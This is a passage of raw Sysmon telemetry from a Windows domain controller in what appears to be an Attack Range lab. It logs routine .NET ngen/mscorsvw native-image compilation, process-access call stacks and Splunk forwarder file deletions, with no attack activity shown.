indows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:23.431{4DB9351A-A1D7-60D3-B303-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e84-0\Microsoft.SecureBoot.Commands.dll2021-06-23 21:04:23.431 23542300x800000000000000020711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.400{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B010DAF68A202C0AD80A3E909B3ABF0,SHA256=F3D35D1B45223B49CF9078295F808153D4605235F3D6C3B450AA5266FCFD9EA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.368{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B303-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.353{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B303-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.353{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B303-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.306{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.290{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.290{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:23.228{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cb8-0\Microsoft.RightsManagementServices.ServerManager.DeploymentPlugin.dll2021-06-23 21:04:23.228 23542300x800000000000000020767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.978{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AB8EEB7A964CB722EF9EBDE84CEEF5A,SHA256=F95D9AE7343C2024A0328451DD5BDFF8EFE7DBA68B43BC879646EBC5629489B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.962{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-C203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.946{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-C203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.946{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-C203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:24.931{4DB9351A-A1D8-60D3-C103-00000000CF01}96C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\60-0\Microsoft.Security.Powershell.Cmdlets.dll2021-06-23 21:04:24.931 10341000x800000000000000020762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.884{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-C103-00000000CF01}96C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.868{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-C103-00000000CF01}96C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.868{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-C103-00000000CF01}96C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.821{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-C003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.806{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-C003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.806{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-C003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:24.775{4DB9351A-A1D8-60D3-BF03-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bcc-0\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.dll2021-06-23 21:04:24.775 10341000x800000000000000020755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.587{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-BF03-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-BF03-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.556{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-BF03-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.525{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45685F56E9CD761AF4D290EC704CB385,SHA256=AD21B269102AC7F483D5BAF59A83AA5000EC960745ECC2A5A41A0452A898B467,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.509{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D8-60D3-BE03-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.493{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D8-60D3-BE03-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:24.493{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D8-60D3-BE03-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30